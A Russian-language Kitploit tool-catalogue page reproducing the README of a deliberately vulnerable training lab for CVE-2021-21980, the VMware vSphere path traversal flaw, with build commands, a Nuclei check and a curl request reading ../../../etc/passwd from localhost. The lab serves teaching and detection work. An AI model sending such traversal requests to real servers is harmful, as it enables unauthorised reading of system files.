Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
vcenter-cve-2021-21980-lab — Реалистичная уязвимая лаборатория для CVE-2021-21980 (VMware vSphere Path Traversal) - реальная эксплуатация файлов, а не имитация сервера | Kitploit
Инструменты/GitHubGitHub/pratikjojode/vcenter-cve-2021-21980-lab
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubpratikjojode/vcenter-cve-2021-21980-lab

vcenter-cve-2021-21980-lab

Реалистичная уязвимая лаборатория для CVE-2021-21980 (VMware vSphere Path Traversal) - реальная эксплуатация файлов, а не имитация сервера

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
18 месяцев назадЕщё не проверено

CVE-2021-21980 Уязвимая тестовая среда

Обзор

Реалистичная тестовая среда, имитирующая уязвимость обхода пути в VMware vSphere Web Client.

⚠️ ВНИМАНИЕ: Уязвимая тестовая среда. Не подвергайте воздействию Интернета!

Быстрый старт

Сборка и запуск

root@kitploit:~
podman build -t vcenter-lab .
podman run -d -p 443:443 --name vcenter-lab vcenter-lab

Проверка вручную

root@kitploit:~
curl -k "https://localhost/ui/vic-rest/services/containerView?id=../../../etc/passwd"

Проверка с помощью Nuclei

root@kitploit:~
nuclei -t CVE-2021-21980.yaml -u https://localhost -debug

Чем это отличается от мок-серверов

✅ Реально читает файлы из файловой системы контейнера с помощью файлового ввода-вывода Python
✅ Реалистичное поведение — обрабатывает обход пути как настоящий vSphere
✅ Заголовки VMware — включает Server: VMware-HTTP-Server/1.0
✅ SSL/TLS — генерация самоподписанного сертификата
✅ Не захардкожено — возвращает реальное содержимое файлов

Сведения об уязвимости

  • CVE: CVE-2021-21980
  • Серьёзность: Высокая (CVSS 7.5)
  • Тип: Обход пути / произвольное чтение файлов
  • Затронутые версии: VMware vCenter Server 7.0, 6.7, 6.5 (без обновлений)

Файлы

  • Dockerfile — конфигурация сборки контейнера
  • server.py — уязвимое Flask-приложение
  • CVE-2021-21980.yaml — шаблон обнаружения Nuclei
  • README.md — этот файл

Подтверждение валидации

Эта лабораторная среда была проверена с помощью Nuclei, что показало:

  • Успешное обнаружение уязвимости
  • Фактическое чтение файлов (а не имитационные ответы)
  • Полные трассировки HTTP-запросов/ответов в режиме отладки

Очистка

root@kitploit:~
podman stop vcenter-lab && podman rm vcenter-lab

Ссылки

  • https://www.vmware.com/security/advisories/VMSA-2021-0002.html
  • https://nvd.nist.gov/vuln/detail/CVE-2021-21980
Скачать инструмент